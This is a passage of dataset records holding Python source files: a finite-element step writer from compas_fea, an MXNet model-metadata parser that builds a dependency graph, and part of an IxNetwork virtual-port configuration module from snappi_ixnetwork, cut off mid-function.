f.write('$\\n')\n\n DLX, DLY, DLZ = 0, 0, 0\n for load in loads.values():\n if load.__name__ == 'GravityLoad':\n com = load.components\n DLX = com['x'] if com['x'] else 0\n DLY = com['y'] if com['y'] else 0\n DLZ = com['z'] if com['z'] else 0\n break\n\n if isinstance(factor, dict):\n pass\n else:\n fact = factor\n\n f.write('$\\n')\n f.write(\"LC 2{0:0>2}0 TITL '{1}'\".format(step_index, key))\n f.write(' DLX {0} DLY {1} DLZ {2}\\n'.format(DLX * fact, DLY * factor, DLZ * fact))\n f.write(' LCC 1{0:0>2}0\\n'.format(step_index))\n\n f.write('$\\n')\n f.write('END\\n')\n f.write('$\\n')\n f.write('$\\n')\n\n # f.write('+PROG ASE\\n')\n # f.write(\"HEAD CREEP {0} LC 3{1:0>2}0 {2}\\n\".format(state.upper(), step_index, key))\n # f.write('$\\n')\n # f.write('CTRL SOLV 1\\n')\n # f.write('CTRL CONC\\n')\n # f.write('CREP NCRE 10\\n')\n\n # if nlgeom == 'YES':\n # f.write('SYST PROB TH3 ITER {0} TOL {1} NMAT {2} PLC 2{3:0>2}0\\n'.format(increments, tolerance, nlmat, step_index))\n # f.write('GRP ALL FACS 1.00 PHI 1.00 PHIF 0 EPS -0.0005\\n')\n\n # f.write('REIQ LCR {0}\\n'.format(step_index))\n # f.write('$\\n')\n\n # DLX, DLY, DLZ = 0, 0, 0\n # for load in loads.values():\n # if load.__name__ == 'GravityLoad':\n # com = load.components\n # DLX = com['x'] if com['x'] else 0\n # DLY = com['y'] if com['y'] else 0\n # DLZ = com['z'] if com['z'] else 0\n # break\n\n # f.write('$\\n')\n # f.write(\"LC 3{0:0>2}0 TITL '{1} CREEP'\".format(step_index, key))\n # f.write(' DLX {0} DLY {1} DLZ {2} FACT {3}\\n'.format(DLX * factor, DLY * factor, DLZ * factor, factor))\n # f.write(' LCC 2{0:0>2}0 PLC YES\\n'.format(step_index))\n\n # f.write('$\\n')\n # f.write('END\\n')\n # f.write('$\\n')\n # f.write('$\\n')\n\n\n# Thermal\n\n# try:\n# duration = step.duration\n# except:\n# duration = 1\n# temperatures = steps[key].temperatures\n# if temperatures:\n# file = misc[temperatures].file\n# einc = str(misc[temperatures].einc)\n# f.write('**\\n')\n# f.write('*TEMPERATURE, FILE={0}, BSTEP=1, BINC=1, ESTEP=1, EINC={1}, INTERPOLATE\\n'.format(file, einc))\n\n# elif stype == 'HeatStep':\n\n# temp0 = step.temp0\n# duration = step.duration\n# deltmx = steps[key].deltmx\n# interaction = interactions[step.interaction]\n# amplitude = interaction.amplitude\n# interface = interaction.interface\n# sink_t = interaction.sink_t\n# film_c = interaction.film_c\n# ambient_t = interaction.ambient_t\n# emissivity = interaction.emissivity\n\n# # Initial T\n\n# f.write('*INITIAL CONDITIONS, TYPE=TEMPERATURE\\n')\n# f.write('NSET_ALL, {0}\\n'.format(temp0))\n# f.write('**\\n')\n\n# # Interface\n\n# f.write('*STEP, NAME={0}, INC={1}\\n'.format(sname, increments))\n# f.write('*{0}, END=PERIOD, DELTMX={1}\\n'.format(method, deltmx))\n# f.write('1, {0}, 5.4e-05, {0}\\n'.format(duration))\n# f.write('**\\n')\n# f.write('*SFILM, AMPLITUDE={0}\\n'.format(amplitude))\n# f.write('{0}, F, {1}, {2}\\n'.format(interface, sink_t, film_c))\n# f.write('**\\n')\n# f.write('*SRADIATE, AMPLITUDE={0}\\n'.format(amplitude))\n# f.write('{0}, R, {1}, {2}\\n'.format(interface, ambient_t, emissivity))\n\n# # fieldOutputs\n\n# f.write('**\\n')\n# f.write('** OUTPUT\\n')\n# f.write('** ------\\n')\n# f.write('*OUTPUT, FIELD\\n')\n# f.write('**\\n')\n# f.write('*NODE OUTPUT\\n')\n# f.write('NT\\n')\n# f.write('**\\n')\n# f.write('*END STEP\\n')\n","sub_path":"src/compas_fea/fea/write_steps.py","file_name":"write_steps.py","file_ext":"py","file_size_in_byte":31474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"366321517","text":"import json\nimport numpy as np\nimport os, sys\nimport networkx as nx\n\nclass MetaInfo:\n def __init__(self, meta_dir):\n self.meta_dir = meta_dir\n with open(os.path.join(meta_dir, \"metadata.json\"), \"r\") as fp:\n self.mx_meta = json.load(fp)\n\n self.cache_meta = {}\n self.cache_raw_meta = {}\n\n ### dependency graph of this model\n self.dag = self.gen_dag()\n\n all_output = self.mx_meta[\"outputs\"]\n all_shape = self.mx_meta[\"out_shapes\"]\n assert len(all_output) == len(all_shape)\n\n ### init name2shape dict, convert name to std. name\n self.name2shape = {}\n for idx, out_ in enumerate(all_output):\n if \"data\" in out_:\n self.name2shape[out_.replace(\"data\", \"I/O_\")] = all_shape[idx]\n elif \"_output\" in out_:\n ### activations\n raw_name = out_.split(\"_output\")[0]\n self.name2shape[\"FW.\" + (raw_name.split(\"_fwd\")[0] if \"_fwd\" in raw_name else raw_name)] = all_shape[idx]\n else:\n ### weights or variables\n self.name2shape[\"Comm.\" + out_] = all_shape[idx]\n\n def ret_mx_metadata(self, node, batch_size=None):\n '''\n node: node name in the dag\n '''\n if node not in self.name2shape:\n raise KeyError(\"shape info for {} is not in the meta data\".format(node))\n if \"FW\" not in node:\n ### only consider FW node\n return\n if node in self.cache_meta:\n op_type, S_mul, S_add, S_in, S_out, S_wei = self.cache_meta[node]\n if batch_size is not None:\n ratio = batch_size / self.cache_raw_meta[node][8]\n else:\n ratio = 1\n return op_type, S_mul * ratio, S_add * ratio, S_in * ratio, S_out * ratio, S_wei\n\n op_type = self.parse_op_type(node)\n if op_type == \"conv\":\n ### outputs\n output_shape = self.name2shape[node]\n assert len(output_shape) == 4, (node, output_shape)\n N = output_shape[0]\n ### TODO (huhanpeng): assume the width=height, the same for input shape\n P = Q = output_shape[2]\n ### different layout, NHWC --> shape[3] or NCHW --> shape[1]\n K = output_shape[3] if output_shape[1] == P else output_shape[1]\n\n ### inputs\n prevs = self.dag.in_edges(node)\n assert len(prevs) == 1, (node, prevs)\n prev_, _ = list(prevs)[0]\n input_shape = self.name2shape[prev_]\n assert input_shape[0] == N, (node, input_shape, output_shape)\n H = W = input_shape[2]\n C = input_shape[3] if input_shape[1] == H else input_shape[1]\n\n ### weights\n bp_node = \"BW.\".join(node.split(\"FW.\"))\n wei_node = bias_node = None\n for succ_ in self.dag.successors(bp_node):\n if \"Comm.\" in succ_:\n if \"wei\" in succ_:\n wei_node = succ_\n elif \"bias\" in succ_:\n bias_node = succ_\n else:\n raise ValueError(\"Conv2D node {} has undefined parameter {}\".format(node, succ_))\n if wei_node is None:\n raise ValueError(\"No variable/weights for {}\".format(node))\n wei_shape = self.name2shape[wei_node]\n # TODO (huhanpeng): still assume the kernel is a square\n if wei_shape[2] == wei_shape[3]:\n R = S = wei_shape[2]\n else:\n R = S = wei_shape[0]\n\n if batch_size is None:\n batch_size = N\n self.cache_meta[node] = op_type, batch_size*K*P*Q*C*R*S, batch_size*K*P*Q*(C*R*S-1), batch_size*H*W*C, batch_size*P*Q*K, R*S*C*K\n self.cache_raw_meta[node] = [H, W, C, R, S, P, Q, K, batch_size, 0 if bias_node is None else 1]\n return self.cache_meta[node]\n elif op_type == \"dense\":\n ### nexts\n output_shape = self.name2shape[node]\n assert len(output_shape) == 2, (node, output_shape)\n B = output_shape[0]\n C_out = output_shape[1]\n\n ### prevs\n prevs = self.dag.in_edges(node)\n assert len(prevs) == 1, prevs\n prev_, _ = list(prevs)[0]\n input_shape = self.name2shape[prev_]\n assert input_shape[0] == (B, node, input_shape, output_shape)\n C_in = input_shape[1]\n\n ### weights\n ### No need to read weights\n if batch_size is None:\n batch_size = B\n self.cache_meta[node] = (op_type, batch_size*C_in*C_out, batch_size*(C_in-1)*C_out, batch_size*C_in, batch_size*C_out, C_in*C_out)\n self.cache_raw_meta[node] = [C_in, C_out] \n return self.cache_meta[node]\n elif op_type == \"cast\":\n ### nexts\n output_shape = self.name2shape[node]\n \n ### prevs\n prevs = self.dag.in_edges(node)\n assert len(prevs) == 1, prevs\n prev_, _ = list(prevs)[0]\n input_shape = self.name2shape[prev_]\n dtype_size = self.dtype2size(inputs[0][\"dtype\"])\n self.cache_meta[node] = (op_type, 0, 0, np.prod(inputs[0][\"shape\"])*dtype_size, np.prod(outputs[0][\"shape\"])*dtype_size, 0)\n return self.cache_meta[node]\n elif op_type == \"embedding\":\n output_shape = self.name2shape[node]\n output_size = np.prod(output_shape)\n if len(output_shape) == 2:\n ### no batch size\n B = None \n elif len(output_shape) == 3:\n B = output_shape[0]\n if batch_size is not None:\n output_size = output_size * batch_size / B\n else:\n raise\n\n ### prevs\n prevs = self.dag.in_edges(node)\n assert len(prevs) == 1, prevs\n prev_, _ = list(prevs)[0]\n input_shape = self.name2shape[prev_]\n input_size = np.prod(input_shape)\n if B is not None and batch_size is not None:\n input_size = input_size * batch_size / B\n\n bp_node = \"BW.\".join(node.split(\"FW.\"))\n comm_node = []\n for succ_ in self.dag.successors(bp_node):\n if \"Comm.\" in succ_:\n comm_node.append(succ_)\n if comm_node is None:\n raise ValueError(\"No variable/weights for {}\".format(node))\n wei_shape = [self.name2shape[e] for e in comm_node][0]\n wei_size = np.prod(wei_shape)\n\n # print(input_shape, output_shape, wei_shape)\n\n self.cache_meta[node] = (op_type, input_size*wei_size, 0, input_size, output_size, wei_size) \n return self.cache_meta[node]\n else:\n raise NotImplementedError(\"Metadata for {} is not implemented yet.\".format(node))\n\n def ret_mx_rawmeta(self, node, batch_size):\n if node not in self.cache_raw_meta:\n self.ret_mx_metadata(node, batch_size)\n if node not in self.cache_raw_meta:\n raise ValueError(node)\n return self.cache_raw_meta[node]\n\n def parse_op_type(self, op_name):\n op_name = op_name.lower()\n if \"conv\" in op_name:\n return \"conv\"\n elif \"dense\" in op_name:\n return \"dense\"\n elif \"cast\" in op_name:\n return \"cast\"\n elif \"embedding\" in op_name:\n return \"embedding\"\n else:\n raise ValueError(\"Undefined op type for {}\".format(op_name))\n \n def gen_dag(self, _main=False):\n \"\"\"Construct a DAG from the mxnet info\n\n Parameters:\n ----------\n s : str\n Must follow the standard chrome trace format and not None.\n \"\"\"\n with open(os.path.join(self.meta_dir, \"symbol_debug_str.txt\"), \"r\") as fp:\n s = fp.read()\n _dag = nx.DiGraph()\n blocks = s.split(\"--------------------\\n\")\n \n #! 3. FW -> OUTPUT and 4. OUTPUT -> BW\n first_ls = blocks[0].split('\\n')\n output_cnt = 0\n for i in range(len(first_ls)):\n if \"Variable:\" in first_ls[i]:\n break\n if \"output[\" in first_ls[i]:\n output_node = first_ls[i].split(']=')[1].split('(')[0]\n output_node = output_node.split(\"_fwd\")[0] if \"_fwd\" in output_node else output_node\n _dag.add_edge(\"FW.\" + output_node, \"OUTPUT%d\"%output_cnt)\n _dag.add_edge(\"OUTPUT%d\"%output_cnt, \"BW.\" + output_node)\n output_cnt += 1\n\n for i in range(1, len(blocks)):\n prev_block = blocks[i-1]\n var = []\n prev_ls = prev_block.split('\\n')\n for l in prev_ls:\n if \"Variable\" in l:\n var.append(l.split('Variable:')[1])\n block = blocks[i]\n ls = block.split('\\n')\n if 'Name' not in ls[0]:\n continue\n name = ls[0].split('Name=')[1]\n op = ls[0].split(',')[0].split(\"Op:\")[1]\n args = []\n for l in ls:\n if \"arg[\" in l:\n arg_name = l.split(']=')[1].split('(')[0]\n if arg_name not in var:\n args.append(arg_name)\n if \"_fwd\" in name:\n name = name.split(\"_fwd\")[0]\n\n #! --------- construct the graph ----\n _dag.add_node(\"FW.\" + name, op=op)\n _dag.add_node(\"BW.\" + name, op=op)\n for innode in args:\n innode = innode.split(\"_fwd\")[0] if \"_fwd\" in innode else innode\n #! 2. FW -> FW and 5. BW -> BW\n _dag.add_edge(\"FW.\" + innode, \"FW.\" + name)\n _dag.add_edge(\"BW.\" + name, \"BW.\" + innode)\n for _var in var:\n if \"data\" in _var:\n _dag.add_edge(_var.replace(\"data\", \"I/O_\"), \"FW.\" + name)\n if _main:\n #! 1. IO -> FW, 8. BW -> UPDATE -> FW \n _dag.add_edge(\"BW.\" + name, \"UPDATE\")\n _dag.add_edge(\"UPDATE\", \"FW.\" + name)\n else:\n #! 7. Comm -> FW and 6. BW -> Comm\n _dag.add_edge(\"Comm.\" + _var, \"UPDATE\")\n _dag.add_edge(\"BW.\" + name, \"Comm.\" + _var)\n return _dag\n ","sub_path":"ml_platform/mxnet/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":10514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"235594592","text":"import json\nimport time\nimport re\nfrom snappi_ixnetwork.timer import Timer\nfrom snappi_ixnetwork.logger import get_ixnet_logger\n\n\nclass Vport(object):\n \"\"\"Transforms OpenAPI objects into IxNetwork objects\n\n Args\n ----\n - ixnetworkapi (Api): instance of the Api class\n\n Transformations\n ---------------\n - /components/schemas/Port to /vport\n - /components/schemas/Layer1 to /vport/l1Config/...\n\n Process\n -------\n - Remove any vports that are not in the config.ports\n - Add any vports that are in the config.ports\n - If the location of the config.ports.location is different than the\n the /vport -connectedTo property set it to None\n - If the config.ports.location is None don't connect the ports\n else connect the port, get the vport type, set the card mode based on the\n config.layer1.speed\n\n Notes\n -----\n - Uses resourcemanager to set the vport location and l1Config as it is the\n most efficient way. DO NOT use the AssignPorts API as it is too slow.\n - Only setup l1Config if location is connected.\n - Given a connected location and speed the vport -type, card resource mode\n and l1Config sub node are derived.\n\n \"\"\"\n\n _SPEED_MAP = {\n \"speed_400_gbps\": \"speed400g\",\n \"speed_200_gbps\": \"speed200g\",\n \"speed_100_gbps\": \"speed100g\",\n \"speed_50_gbps\": \"speed50g\",\n \"speed_40_gbps\": \"speed40g\",\n \"speed_25_gbps\": \"speed25g\",\n \"speed_10_gbps\": \"speed10g\",\n \"speed_1_gbps\": \"speed1000\",\n \"speed_100_fd_mbps\": \"speed100fd\",\n \"speed_100_hd_mbps\": \"speed100hd\",\n \"speed_10_fd_mbps\": \"speed10fd\",\n \"speed_10_hd_mbps\": \"speed10hd\",\n }\n _VM_SPEED_MAP = {\n \"speed_400_gbps\": \"speed400g\",\n \"speed_200_gbps\": \"speed200g\",\n \"speed_100_gbps\": \"speed100g\",\n \"speed_90_gbps\": \"speed90g\",\n \"speed_80_gbps\": \"speed80g\",\n \"speed_70_gbps\": \"speed70g\",\n \"speed_60_gbps\": \"speed60g\",\n \"speed_50_gbps\": \"speed50g\",\n \"speed_40_gbps\": \"speed40g\",\n \"speed_30_gbps\": \"speed30g\",\n \"speed_25_gbps\": \"speed25g\",\n \"speed_20_gbps\": \"speed20g\",\n \"speed_10_gbps\": \"speed10g\",\n \"speed_9_gbps\": \"speed9000\",\n \"speed_8_gbps\": \"speed8000\",\n \"speed_7_gbps\": \"speed7000\",\n \"speed_6_gbps\": \"speed6000\",\n \"speed_5_gbps\": \"speed5000\",\n \"speed_4_gbps\": \"speed4000\",\n \"speed_3_gbps\": \"speed3000\",\n \"speed_2_gbps\": \"speed2000\",\n \"speed_1_gbps\": \"speed1000\",\n \"speed_100_mbps\": \"speed100\",\n \"speed_100_fd_mbps\": \"speed100\",\n \"speed_100_hd_mbps\": \"speed100\",\n \"speed_10_fd_mbps\": \"speed100\",\n \"speed_10_hd_mbps\": \"speed100\",\n }\n\n _SPEED_MODE_MAP = {\n \"speed_1_gbps\": \"normal\",\n \"speed_10_gbps\": \"tengig\",\n \"speed_25_gbps\": \"twentyfivegig\",\n \"speed_40_gbps\": \"fortygig\",\n \"speed_50_gbps\": \"fiftygig\",\n \"speed_100_gbps\": \"^(?!.*(twohundredgig|fourhundredgig)).*hundredgig.*$\",\n \"speed_200_gbps\": \"twohundredgig\",\n \"speed_400_gbps\": \"fourhundredgig\",\n }\n\n _ADVERTISE_MAP = {\n \"advertise_one_thousand_mbps\": \"speed1000\",\n \"advertise_one_hundred_fd_mbps\": \"speed100fd\",\n \"advertise_one_hundred_hd_mbps\": \"speed100hd\",\n \"advertise_ten_fd_mbps\": \"speed10fd\",\n \"advertise_ten_hd_mbps\": \"speed10hd\",\n }\n _FLOW_CONTROL_MAP = {\n \"ieee_802_1qbb\": \"ieee802.1Qbb\",\n \"ieee_802_3x\": \"ieee802.3x\",\n }\n\n _RESULT_COLUMNS = [\n (\"frames_tx\", \"Frames Tx.\", int),\n (\"frames_rx\", \"Valid Frames Rx.\", int),\n (\"frames_tx_rate\", \"Frames Tx. Rate\", float),\n (\"frames_rx_rate\", \"Valid Frames Rx. Rate\", float),\n (\"bytes_tx\", \"Bytes Tx.\", int),\n (\"bytes_rx\", \"Bytes Rx.\", int),\n (\"bytes_tx_rate\", \"Bytes Tx. Rate\", float),\n (\"bytes_rx_rate\", \"Bytes Rx. Rate\", float),\n # ('pfc_class_0_frames_rx', 'Rx Pause Priority Group 0 Frames', int),\n # ('pfc_class_1_frames_rx', 'Rx Pause Priority Group 1 Frames', int),\n # ('pfc_class_2_frames_rx', 'Rx Pause Priority Group 2 Frames', int),\n # ('pfc_class_3_frames_rx', 'Rx Pause Priority Group 3 Frames', int),\n # ('pfc_class_4_frames_rx', 'Rx Pause Priority Group 4 Frames', int),\n # ('pfc_class_5_frames_rx', 'Rx Pause Priority Group 5 Frames', int),\n # ('pfc_class_6_frames_rx', 'Rx Pause Priority Group 6 Frames', int),\n # ('pfc_class_7_frames_rx', 'Rx Pause Priority Group 7 Frames', int),\n ]\n\n def __init__(self, ixnetworkapi):\n self._api = ixnetworkapi\n self._layer1_check = []\n self._interval = 1\n self._timeout = 10\n self.logger = get_ixnet_logger(__name__)\n\n def config(self):\n \"\"\"Transform config.ports into Ixnetwork.Vport\n 1) delete any vport that is not part of the config\n 2) create a vport for every config.ports[] not present in IxNetwork\n 3) set config.ports[].location to /vport -location or -connectedTo\n 4) set /vport/l1Config/... properties using the corrected /vport -type\n 5) connectPorts to use new l1Config settings and clearownership\n \"\"\"\n self.logger.debug(\"Configuring Vports\")\n self._resource_manager = self._api._ixnetwork.ResourceManager\n self._ixn_vport = self._api._vport\n self._layer1_check = []\n self._api._ixnetwork.StopAllProtocols(arg1=\"sync\")\n self._wait_for(lambda: self.is_protocols_stopped(),\n \"\"\"\"Protocols are not stopped in {} seconds\"\"\".format(\n self._interval * self._timeout),\n self._interval,\n self._timeout)\n with Timer(self._api, \"Ports configuration\"):\n self._delete_vports()\n self._create_vports()\n with Timer(self._api, \"Captures configuration\"):\n self._api.capture.config()\n with Timer(self._api, \"Location configuration\"):\n self._set_location()\n with Timer(self._api, \"Layer1 configuration\"):\n self._set_layer1()\n\n def _wait_for(self, func, exp_msg, interval, timeout):\n end_time = round(time.time()) + timeout\n while True:\n res = func()\n if round(time.time()) >= end_time:\n raise Exception(exp_msg)\n if res:\n return res\n time.sleep(interval)\n\n def is_protocols_stopped(self):\n topos = self._api._ixnetwork.Topology.find()\n stopped = True\n if len(topos) > 0:\n dgs = topos.DeviceGroup.find()\n if len(dgs) > 0:\n eth_list = dgs.Ethernet.find()\n if len(eth_list) > 0:\n if len(eth_list.Ipv4.find()) > 0:\n if any('up' in status or 'down' in status\n for status in\n dgs.Ethernet.find().SessionStatus):\n stopped = False\n\n return stopped\n\n def set_link_state(self, link_state):\n self.logger.debug(\"Vport setting link state\")\n with Timer(self._api, \"Link State operation\"):\n payload = {\n \"arg1\": [],\n \"arg2\": link_state.state,\n }\n for port_name in link_state.port_names:\n payload[\"arg1\"].append(\n self._api.ixn_objects.get_href(port_name)\n )\n url = \"%s/vport/operations/linkupdn\" % self._api._ixnetwork.href\n self._api._request(\"POST\", url, payload)\n\n def _import(self, imports):\n self.logger.debug(\"Importing vport configs\")\n if len(imports) > 0:\n errata = self._resource_manager.ImportConfig(\n json.dumps(imports), False\n )\n for item in errata:\n self._api.warning(item)\n return len(errata) == 0\n return True\n\n def _delete_vports(self):\n \"\"\"Delete any vports from the api server that do not exist in the new config\"\"\"\n self.logger.debug(\"Deleting vports\")\n self._api._remove(self._ixn_vport, self._api.snappi_config.ports)\n\n def _create_vports(self):\n \"\"\"Add any vports to the api server that do not already exist\"\"\"\n self.logger.debug(\"Creating vports\")\n vports = self._api.select_vports()\n imports = []\n for port in self._api.snappi_config.ports:\n if port.name not in vports.keys():\n index = len(vports) + len(imports) + 1\n vport_import = {\n \"xpath\": \"/vport[%i]\" % index,\n \"name\": port.name,\n \"rxMode\": \"captureAndMeasure\",\n \"txMode\": \"interleaved\",\n }\n location = port.get(\"location\")\n if location is None:\n vport_import[\"connectedTo\"] = location\n port.location = None\n imports.append(vport_import)\n self._import(imports)\n for name, vport in self._api.select_vports().items():\n self._api.ixn_objects.set(name, vport)\n\n def _add_hosts(self, HostReadyTimeout):\n self.logger.debug(\"Adding hosts in vport\")\n chassis = self._api._ixnetwork.AvailableHardware.Chassis\n add_addresses = []\n check_addresses = []\n for port in self._api.snappi_config.ports:\n location = port.get(\"location\")\n if location is not None:\n location_info = self._api.parse_location_info(location)\n chassis_address = location_info.chassis_info\n chassis.find(Hostname=\"^%s$\" % chassis_address)\n if len(chassis) == 0:\n add_addresses.append(chassis_address)\n check_addresses.append(chassis_address)\n add_addresses = set(add_addresses)\n check_addresses = set(check_addresses)\n if len(add_addresses) > 0:\n with Timer(\n self._api, \"Add location hosts [%s]\" % \", \".join(add_addresses)\n ):\n for add_address in add_addresses:\n chassis.add(Hostname=add_address)\n if len(check_addresses) > 0:\n with Timer(\n self._api,\n \"Location hosts ready [%s]\" % \", \".join(check_addresses),\n ):\n start_time = time.time()\n while True:\n chassis.find(\n Hostname=\"^(%s)$\" % \"|\".join(check_addresses),\n State=\"^ready$\",\n )\n if len(chassis) == len(check_addresses):\n break\n if time.time() - start_time > HostReadyTimeout:\n raise RuntimeError(\n \"After %s seconds, not all location hosts [%s] are reachable\"\n % (HostReadyTimeout, \", \".join(check_addresses))\n )\n time.sleep(2)\n\n def _set_location(self):\n location_supported = True\n try:\n self._api._ixnetwork._connection._options(\n self._api._ixnetwork.href + \"/locations\"\n )\n except Exception:\n location_supported = False\n\n self._add_hosts(60)\n with Timer(self._api, \"Aggregation mode speed change\"):\n layer1_check = self._api.resource_group.set_group()\n self._layer1_check.extend(layer1_check)\n vports = self._api.select_vports()\n locations = []\n imports = []\n clear_locations = []\n for port in self._api.snappi_config.ports:\n vport = vports[port.name]\n location = port.get(\"location\")\n\n if location_supported is True:\n if vport[\"location\"] == location and vport[\n \"connectionState\"\n ].startswith(\"connectedLink\"):\n continue\n else:\n if len(vport[\"connectedTo\"]) > 0 and vport[\n \"connectionState\"\n ].startswith(\"connectedLink\"):\n continue\n\n self._api.ixn_objects.set(port.name, vport)\n vport = {\"xpath\": vports[port.name][\"xpath\"]}\n if location_supported is True:\n vport[\"location\"] = location\n else:\n if location is not None:\n xpath = self._api.select_chassis_card_port(location)\n vport[\"connectedTo\"] = xpath\n else:\n vport[\"connectedTo\"] = \"\"\n imports.append(vport)\n if location is not None and len(location) > 0:\n clear_locations.append(location)\n locations.append(port.name)\n if len(locations) == 0:\n return\n self._clear_ownership(clear_locations)\n with Timer(self._api, \"Location connect [%s]\" % \", \".join(locations)):\n self._import(imports)\n with Timer(\n self._api, \"Location state check [%s]\" % \", \".join(locations)\n ):\n self._api._vport.find(ConnectionState=\"^(?!connectedLink).*$\")\n if len(self._api._vport) > 0:\n self._api._vport.ConnectPorts()\n start = time.time()\n timeout = 10\n while True:\n self._api._vport.find(\n Name=\"^(%s)$\"\n % \"|\".join(self._api.special_char(locations)),\n ConnectionState=\"^connectedLink\",\n )\n if len(self._api._vport) == len(locations):\n break\n if time.time() - start > timeout:\n unreachable = []\n self._api._vport.find(\n ConnectionState=\"^(?!connectedLink).*$\"\n )\n for vport in self._api._vport:\n unreachable.append(\n \"%s [%s: %s]\"\n % (\n vport.Name,\n vport.ConnectionState,\n vport.ConnectionStatus,\n )\n )\n raise RuntimeError(\n \"After %s seconds, %s are unreachable\"\n % (timeout, \", \".join(unreachable))\n )\n time.sleep(2)\n for vport in self._api._vport.find(\n ConnectionState=\"^(?!connectedLinkUp).*$\"\n ):\n self._api.warning(\n \"%s %s\" % (vport.Name, vport.ConnectionState)\n )\n\n def _set_layer1(self):\n \"\"\"Set the /vport/l1Config/... properties\n This should only happen if the vport connectionState is connectedLink...\n as it determines the ./l1Config child node.\n \"\"\"\n layer1_config = self._api.snappi_config.get(\"layer1\")\n if layer1_config is None:\n return\n if len(layer1_config) == 0:\n return\n reset_auto_negotiation = dict()\n # set and commit the card resource mode\n vports = self._api.select_vports()\n imports = []\n for layer1 in layer1_config:\n for port_name in layer1.port_names:\n self._set_card_resource_mode(\n vports[port_name], layer1, imports\n )\n if self._import(imports) is False:\n # WARNING: this retry is because no reasonable answer as to why\n # changing card mode periodically fails with this opaque message\n # 'Releasing ownership on ports failed.'\n self._api.info(\"Retrying card resource mode change\")\n self._import(imports)\n # set the vport type\n imports = []\n for layer1 in layer1_config:\n for port_name in layer1.port_names:\n self._set_vport_type(vports[port_name], layer1, imports)\n self._import(imports)\n vports = self._api.select_vports()\n # set the remainder of l1config properties\n imports = []\n for layer1 in layer1_config:\n for port_name in layer1.port_names:\n self._set_l1config_properties(\n vports[port_name], layer1, imports\n )\n self._import(imports)\n # Due to dependency attribute (ieeeL1Defaults)\n # reset enableAutoNegotiation\n imports = []\n for layer1 in layer1_config:\n for port_name in layer1.port_names:\n vport = vports[port_name]\n if (\n port_name in reset_auto_negotiation\n and reset_auto_negotiation[port_name]\n ):\n self._reset_auto_negotiation(vport, layer1, imports)\n self._import(imports)\n\n def _set_l1config_properties(self, vport, layer1, imports):\n \"\"\"Set vport l1config properties\"\"\"\n if vport[\"connectionState\"] not in [\n \"connectedLinkUp\",\n \"connectedLinkDown\",\n ]:\n return\n self._set_fcoe(vport, layer1, imports)\n self._import(imports)\n\n self._set_auto_negotiation(vport, layer1, imports)\n\n def _set_card_resource_mode(self, vport, layer1, imports):\n \"\"\"If the card has an aggregation mode set it according to the speed\"\"\"\n if (\n vport[\"connectionState\"]\n not in [\"connectedLinkUp\", \"connectedLinkDown\"]\n or layer1.name in self._layer1_check\n ):\n return\n\n aggregation_mode = None\n if layer1.speed in Vport._SPEED_MODE_MAP:\n card = self._api.select_chassis_card(vport)\n mode = Vport._SPEED_MODE_MAP[layer1.speed]\n for available_mode in card[\"availableModes\"]:\n if re.search(mode, available_mode.lower()) is not None:\n aggregation_mode = available_mode\n break\n if (\n aggregation_mode is not None\n and aggregation_mode != card[\"aggregationMode\"]\n ):\n self._api.info(\n \"Setting %s to resource mode %s\"\n % (card[\"description\"], aggregation_mode)\n )\n imports.append(\n {\"xpath\": card[\"xpath\"], \"aggregationMode\": aggregation_mode}\n )\n\n def _set_auto_negotiation(self, vport, layer1, imports):\n if layer1.speed.endswith(\"_mbps\") or layer1.speed == \"speed_1_gbps\":\n self._set_ethernet_auto_negotiation(vport, layer1, imports)\n else:\n self._set_gigabit_auto_negotiation(vport, layer1, imports)\n\n def _set_vport_type(self, vport, layer1, imports):\n \"\"\"Set the /vport -type\n\n If flow_control is not None then the -type attribute should\n be switched to a type with the Fcoe extension if it is allowed.\n\n If flow_control is None then the -type attribute should\n be switched to a type without the Fcoe extension.\n \"\"\"\n fcoe = False\n flow_control = layer1.get(\"flow_control\")\n if flow_control is not None:\n fcoe = True\n vport_type = vport[\"type\"]\n elegible_fcoe_vport_types = [\n \"ethernet\",\n \"tenGigLan\",\n \"fortyGigLan\",\n \"tenGigWan\",\n \"hundredGigLan\",\n \"tenFortyHundredGigLan\",\n \"novusHundredGigLan\",\n \"novusTenGigLan\",\n \"krakenFourHundredGigLan\",\n \"aresOneFourHundredGigLan\",\n \"starFourHundredGigLan\",\n ]\n if fcoe is True and vport_type in elegible_fcoe_vport_types:\n vport_type = vport_type + \"Fcoe\"\n if fcoe is False and vport_type.endswith(\"Fcoe\"):\n vport_type = vport_type.replace(\"Fcoe\", \"\")\n if vport_type != vport[\"type\"]:\n imports.append(\n {\n \"xpath\": vport[\"xpath\"] + \"/l1Config\",\n \"currentType\": vport_type,\n }\n )\n return vport_type\n\n def _set_ethernet_auto_negotiation(self, vport, layer1, imports):\n advertise = []\n if layer1.speed == \"speed_1_gbps\":\n advertise.append(\n Vport._ADVERTISE_MAP[\"advertise_one_thousand_mbps\"]\n )\n if layer1.speed == \"speed_100_fd_mbps\":\n advertise.append(\n Vport._ADVERTISE_MAP[\"advertise_one_hundred_fd_mbps\"]\n )\n if layer1.speed == \"speed_100_hd_mbps\":\n advertise.append(\n Vport._ADVERTISE_MAP[\"advertise_one_hundred_hd_mbps\"]\n )\n if layer1.speed == \"speed_10_fd_mbps\":\n advertise.append(Vport._ADVERTISE_MAP[\"advertise_ten_fd_mbps\"])\n if layer1.speed == \"speed_10_hd_mbps\":\n advertise.append(Vport._ADVERTISE_MAP[\"advertise_ten_hd_mbps\"])\n proposed_import = {\n \"xpath\": vport[\"xpath\"]\n + \"/l1Config/\"\n + vport[\"type\"].replace(\"Fcoe\", \"\"),\n \"speed\": self._get_speed(vport, layer1),\n \"media\": layer1.get(\"media\", with_default=True),\n \"autoNegotiate\": layer1.get(\"auto_negotiate\", with_default=True),\n \"speedAuto\": advertise,\n }\n self._add_l1config_import(vport, proposed_import, imports)\n\n def _add_l1config_import(self, vport, proposed_import, imports):\n type = vport[\"type\"].replace(\"Fcoe\", \"\")\n l1config = vport[\"l1Config\"][type]\n key_to_remove = []\n for key in proposed_import:\n if key == \"xpath\":\n continue\n if key not in l1config or l1config[key] == proposed_import[key]:\n key_to_remove.append(key)\n # add this constrain due to handle some specific use case (1G to 10G)\n if \"speed\" in key_to_remove and \"speedAuto\" not in key_to_remove:\n key_to_remove.remove(\"speed\")\n for key in key_to_remove:\n 